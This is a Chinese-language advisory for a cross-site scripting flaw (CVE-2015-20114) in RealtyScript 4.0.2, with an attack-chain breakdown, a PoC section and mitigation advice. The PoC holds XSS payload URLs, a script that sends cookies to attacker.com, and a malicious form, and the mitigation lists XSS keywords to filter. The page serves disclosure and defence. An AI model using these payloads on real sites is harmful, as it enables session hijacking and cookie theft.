CVE-2015-20114 Next Click Ventures RealtyScript跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2015-20114

漏洞类型

XSS跨站脚本攻击

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Next Click Ventures RealtyScript 4.0.2

漏洞概述

CVE-2015-20114是Next Click Ventures公司开发的RealtyScript 4.0.2版本中存在的跨站脚本（XSS）漏洞。该漏洞允许攻击者通过多个未正确过滤和转义的参数注入恶意HTML或JavaScript脚本代码。当受害者在浏览器中打开包含恶意脚本的页面时，攻击者可以在用户的浏览器会话中执行任意脚本代码，从而窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面显示内容。此漏洞属于存储型或反射型XSS，具体取决于注入点的持久化特性。由于攻击利用需要用户交互（如点击恶意链接或访问特制页面），且CVSS评分为6.1（中等严重程度），建议相关用户尽快采取修复措施。

技术细节

该XSS漏洞存在于RealtyScript 4.0.2的多个输入参数中。攻击者可以利用未对用户输入进行充分验证和转义的缺陷，构造包含JavaScript代码的恶意请求。具体而言，当应用程序将用户提交的参数值直接回显到HTML响应中而未进行适当的HTML实体编码（如将<转换为<，将>转换为>，将"转换为"等）时，攻击者注入的脚本标签和JavaScript代码将被浏览器解析执行。典型的攻击Payload可能包含<script>标签、事件处理器（如onerror、onload）或javascript:伪协议。攻击者通过诱导受害者访问包含恶意脚本的URL或提交包含恶意数据的表单，实现对用户浏览器会话的劫持或敏感信息的窃取。漏洞的利用复杂度较低，无需认证即可发起攻击，但需要一定的用户交互。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的RealtyScript版本，发现4.0.2版本存在XSS漏洞

STEP 2

步骤2

Payload构造：攻击者构造包含恶意JavaScript代码的XSS Payload，如<script>标签或事件处理器

STEP 3

步骤3

请求注入：攻击者将恶意Payload注入到RealtyScript的多个未过滤参数中（如search、id、name等参数）

STEP 4

步骤4

诱导用户：攻击者通过钓鱼邮件、社交工程或恶意链接诱导目标用户访问包含XSS Payload的URL

STEP 5

步骤5

脚本执行：用户浏览器解析响应时执行注入的恶意JavaScript代码，在用户会话上下文中运行

STEP 6

步骤6

攻击完成：攻击者通过JavaScript代码窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2015-20114 XSS PoC for RealtyScript 4.0.2 -->
<!-- Multiple parameters are vulnerable to XSS injection -->

<!-- Basic PoC using script tag -->
https://target-site.com/search?q=<script>alert('XSS')</script>
https://target-site.com/property?id=<script>alert(document.cookie)</script>
https://target-site.com/listing?name=<img src=x onerror=alert('XSS')>

<!-- PoC using event handlers -->
https://target-site.com/page?param=<svg onload=alert('XSS')>
https://target-site.com/search?keyword=<body onload=alert('XSS')>
https://target-site.com/agent?name=<iframe src="javascript:alert('XSS')">

<!-- Cookie stealing PoC -->
<script>
  var cookies = document.cookie;
  var img = new Image();
  img.src = "http://attacker.com/steal?c=" + encodeURIComponent(cookies);
</script>

<!-- Form submission with XSS payload -->
<form action="http://target-site.com/submit" method="POST">
  <input type="hidden" name="comment" value="<script>alert('XSS')</script>">
  <input type="submit" value="Click">
</form>

影响范围

Next Click Ventures RealtyScript 4.0.2

防御指南

临时缓解措施

在官方修复补丁发布前，可采取以下临时缓解措施：1）使用WAF规则过滤包含<script>、javascript:、onerror、onload等XSS特征的请求；2）实施严格的输入验证白名单机制；3）启用浏览器的XSS过滤器（如Chrome的XSS Auditor）；4）对敏感操作实施额外的CSRF Token验证；5）监控应用日志中的异常请求模式；6）限制用户输入长度和允许的字符类型；7）对关键功能实施双因素认证以防止会话劫持。